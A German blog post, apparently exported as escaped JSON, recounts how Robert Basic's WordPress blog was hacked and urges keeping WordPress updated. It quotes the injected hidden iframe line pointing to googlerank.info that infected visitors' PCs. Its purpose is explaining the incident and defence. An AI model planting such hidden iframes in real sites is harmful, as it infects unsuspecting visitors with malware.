Das Blog von Robert Basic wurde gehacked.
\nEr hat es mittlerweile auf die neueste WordPress Version neu aufgesetzt.<\/p>\n
Wie er gehacked wurde, erkl\u00e4rt er wie folgt:<\/p>\n
1. Hacker hat in die Datei wp-includes\/template-functions-general.php folgenden Code eingeschleust (links die gehackte Datei, rechts das Original der WP-Version 2.0.7)
\n2. Somit wurde folgende Codezeile beim Generieren aller Blogseiten erzeugt:
\niframe src=http:\/\/googlerank.info width=1 height=1 style=display:none
\n3. Wer die Startseite basicthinking.de mit einem ungesch\u00fctzten PC besucht hat, vaD \u00fcber \u00e4ltere IE-Browser, war gek\u00fcsst, da er sich damit einen Virus eingfangen hat (denn die infizierte Seite wurde per iframe mit geladen). Ohne dass der User vom vorigen Artikel gewusst hatte, rief er mich rein zuf\u00e4llig vorhin an, seine Tochter habe meine Startseite besucht und danach sei der PC verseucht gewesen. Das hat ihn mehrere Stunden gekostet, den PC wieder neu aufzusetzen. I\u2019m very sorry. Surft man die besagte Domain mit einem sichereren Browser an, zB FF 3, wird die Seite geblockt.<\/p><\/blockquote>\nWeitere Details<\/a> finden sich in seinem Blog.<\/p>\n
Normalerweise w\u00fcrde ich ja sagen: Kommt schon mal vor.
\nDoch da Robert in weiser Voraussicht im Mai noch einen Artikel \u00fcber WordPress Sicherheit<\/a> verfasst hat, finde ich das jetzt schon etwas peinlich. \ud83d\ude09
\nNa ja, ok: Kommt schon mal vor!
\nSo, genug gestichelt. Wenn wir mal gehacked werden, steht ihm daf\u00fcr eine Retourkutsche zu. Versprochen. \ud83d\ude42<\/p>\nWichtig: WordPress aktuell halten!<\/strong>
\nWie das Beispiel von Roberts Blog zeigt, kann man sein System eigentlich nie aktuell genug halten.
\n\u00dcbrigens gibt es immer noch eine Menge Blogs, die auf alten WordPress Versionen laufen.
\nEin aktuelles und prominentes Beispiel: Macnotes.de
\nDie Seiten von Macnotes l\u00e4uft derzeit laut Quellcode noch auf WordPress 2.3.3.
\nWelche Schlafm\u00fctze k\u00fcmmert sich dort eigentlich um die Server und die Seite?<\/p>\nNoch ein Tip:<\/strong>
\nWir vergleichen unsere regelm\u00e4\u00dfigen Datensicherungen der Dateien immer wieder mit dem Original bzw. mit \u00e4lteren St\u00e4nden. So sollten wir, zumindest hoffen wir das, es merken, wenn jemand uns Code unterjubelt. Gegen andere Hacks, die direkt in die Datenbank schreiben, hilft das nat\u00fcrlich nicht.<\/p>\n","protected":false},"excerpt":{"rendered":"Das Blog von Robert Basic wurde gehacked. Er hat es mittlerweile auf die neueste WordPress Version neu aufgesetzt. Wie er gehacked wurde, erkl\u00e4rt er wie folgt: 1. Hacker hat in die Datei wp-includes\/template-functions-general.php folgenden Code eingeschleust (links die gehackte Datei, … Weiterlesen